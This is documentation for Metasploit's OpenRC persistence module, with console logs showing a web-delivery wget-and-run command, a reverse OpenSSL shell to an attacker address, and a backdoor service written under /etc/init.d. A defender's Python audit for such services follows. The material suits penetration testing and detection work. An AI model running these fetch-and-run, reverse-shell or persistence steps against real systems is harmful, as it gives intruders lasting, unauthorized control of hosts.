GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/persistence/init_openrc.md

Vulnerable Application

This module will create a service on the box via OpenRC and mark it for auto-restart. It needs enough access to write service files and potentially restart services.

Verified against Alpine 3.21.2

Verification Steps

  1. Exploit a box and get a root session

  2. use exploit/linux/persistence/init_openrc

  3. set SESSION <session>

  4. set PAYLOAD <payload>

  5. set LHOST <lhost>

  6. exploit

Options

WritableDir

Remote writable directory to store the payload. Avoid using /tmp, as its contents are deleted upon reboot.

SERVICE

The name of the service to create. If not chosen, a random one is created.

PAYLOAD_NAME

The name of the file to write our shell to if a non-cmd payload is used. If not chosen, a random one is created.

Scenarios

Alpine Linux 3.21.2

Of note, the default install of Alpine doesn't have curl or bash. The OpenSSL payload (cmd/unix/reverse_openssl) was confirmed working, though.

Initial access vector via web delivery

```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO xK7yCqmS --no-check-certificate http://111.111.1.111:8181/l; chmod +x xK7yCqmS; ./xK7yCqmS& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:33954) at 2025-02-09 09:31:16 -0500

[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

(Meterpreter 1)(/root) > getuid
Server username: root
(Meterpreter 1)(/root) > sysinfo
Computer     : alpine3.21.2
OS           : (Linux 6.12.12-0-virt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/root) > background
[*] Backgrounding session 1...
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_openrc
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set payload payload/cmd/unix/reverse_openssl
payload => cmd/unix/reverse_openssl
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > exploit
[+] sh -c '(sleep 4296|openssl s_client -quiet -connect 111.111.1.111:4444|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 111.111.1.111:4444 >/dev/null 2>&1 &)'
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_openrc) > 
[*] Started reverse double SSL handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /tmp/ is writable and openrc based
[*] Writing backdoor to /tmp//rljkrbglMY
[*] Writing service: /etc/init.d/GpdAgZVBGWq
[*] Writing '/etc/init.d/GpdAgZVBGWq' (141 bytes) ...
[*] Enabling service
[+] Starting service
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/alpine3.21.2_20250209.3159/alpine3.21.2_20250209.3159.rc
[*] Command: echo duVbKHsRwQ5D05J7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "duVbKHsRwQ5D05J7\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (111.111.1.111:4444 -> 222.222.2.222:43560) at 2025-02-09 09:32:07 -0500
```
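The log above shows the three artifacts this module leaves on the host: a payload file written under WritableDir (here /tmp), a new service script under /etc/init.d, and that service enabled in a runlevel and started. The audit below is an added example for defenders, not code from Metasploit or from this module. It enumerates OpenRC init scripts, reads each script's `command=` line, resolves which runlevels enable it through the `/etc/runlevels/<level>/<service>` symlinks that `rc-update add` creates, and flags any script that executes from a volatile directory such as /tmp. The service name and payload path in the fixture are taken from the log above; the fixture's script contents, the sshd control service, the `VOLATILE_DIRS` list and the `audit_openrc`/`build_fixture` helper names are assumptions made for this example.

```python
"""Audit OpenRC service scripts for boot-persistence indicators.

Added example (not part of Metasploit or the init_openrc module): walks
<root>/etc/init.d, resolves which runlevels enable each script via the
symlinks under <root>/etc/runlevels/<level>/, and flags scripts whose
text references a volatile directory such as /tmp. Taking <root> as a
parameter lets the same code run against a live host ("/") or against a
constructed fixture tree.
"""
import os
import re
import tempfile
from pathlib import Path

# Directories a legitimate boot service should not execute from (assumption).
VOLATILE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Matches `command=/path` or `command="/path"` as written in openrc-run scripts.
COMMAND_RE = re.compile(r'^\s*command=["\']?(\S+?)["\']?\s*$', re.MULTILINE)

# A volatile dir followed by "/", not preceded by a path component or word char,
# so "/var/tmp/x" is reported as /var/tmp rather than also as /tmp.
VOLATILE_RE = re.compile(
    r"(?<![\w/])(" + "|".join(map(re.escape, VOLATILE_DIRS)) + r")/"
)


def enabled_runlevels(root: Path, service: str) -> list[str]:
    """Runlevels in which `service` is enabled. `rc-update add` creates the
    symlink /etc/runlevels/<level>/<service> -> /etc/init.d/<service>."""
    levels_dir = root / "etc" / "runlevels"
    if not levels_dir.is_dir():
        return []
    return sorted(
        level.name
        for level in levels_dir.iterdir()
        if level.is_dir() and os.path.lexists(level / service)
    )


def audit_openrc(root: Path = Path("/")) -> list[dict]:
    """One finding per init script that references a volatile directory."""
    findings = []
    init_dir = root / "etc" / "init.d"
    for script in sorted(init_dir.iterdir()):
        if not script.is_file():
            continue
        text = script.read_text(errors="replace")
        hits = sorted(set(VOLATILE_RE.findall(text)))
        if not hits:
            continue
        commands = COMMAND_RE.findall(text)
        findings.append({
            "service": script.name,
            "command": commands[0] if commands else None,
            "volatile_dirs": hits,
            "runlevels": enabled_runlevels(root, script.name),
        })
    return findings


def build_fixture(base: Path) -> Path:
    """Constructed fixture tree (sample data, not a real system image): one
    ordinary service and one that launches a binary out of /tmp and is
    enabled in the default runlevel, mirroring the artifacts in the log."""
    init_dir = base / "etc" / "init.d"
    init_dir.mkdir(parents=True)
    (init_dir / "sshd").write_text(
        '#!/sbin/openrc-run\ncommand="/usr/sbin/sshd"\ncommand_args="-D"\n'
    )
    (init_dir / "GpdAgZVBGWq").write_text(
        '#!/sbin/openrc-run\ncommand="/tmp/rljkrbglMY"\ncommand_background=true\n'
    )
    for level, names in {"boot": [], "default": ["sshd", "GpdAgZVBGWq"]}.items():
        level_dir = base / "etc" / "runlevels" / level
        level_dir.mkdir(parents=True)
        for name in names:
            os.symlink(init_dir / name, level_dir / name)
    return base


def run_fixture_audit() -> list[dict]:
    """Build the constructed fixture in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_openrc(build_fixture(Path(tmp)))


if __name__ == "__main__":
    for finding in run_fixture_audit():
        print(finding)
```

On an Alpine host, call `audit_openrc(Path("/"))` and pair the result with `rc-status` and the modification times under /etc/init.d and /etc/runlevels. A reference to /tmp is only the weakest signal: the option text above already advises choosing a non-volatile WritableDir, so a newly enabled service whose script was written outside package management should be reviewed even when its command path looks ordinary.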